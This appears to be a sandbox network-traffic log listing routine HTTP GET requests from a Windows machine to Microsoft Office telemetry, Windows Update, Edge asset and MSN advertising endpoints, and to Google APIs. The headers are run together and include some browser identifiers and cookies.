Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KM3zyh56Yr5CFe3&MD=OeGs9yZU HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731971181&P2=404&P3=2&P4=MRnAzoeSjEDyWQ6JAWZtX9RJphm9QCEFkw%2fcMNMhzLbx2eEOQSTB5KfHfWengWikXRyXdjU2JRd1HtStvPiLMA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: /LrG3OwAtz/uKMwqeO/IyoSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731366386049&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f29aaf89f12a45dd89a5f5206a84f4ea&activityId=f29aaf89f12a45dd89a5f5206a84f4ea&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=11FAD531813A66492642C0058058675E&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=15da7b1a494847d6986ff006e626cc18 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1296350c4b632a8fa60522d1731366387; XID=1296350c4b632a8fa60522d1731366387
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=11FAD531813A66492642C0058058675E&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=f670eeaf4ab44abfded817be1fb12d49 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msOZ4.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
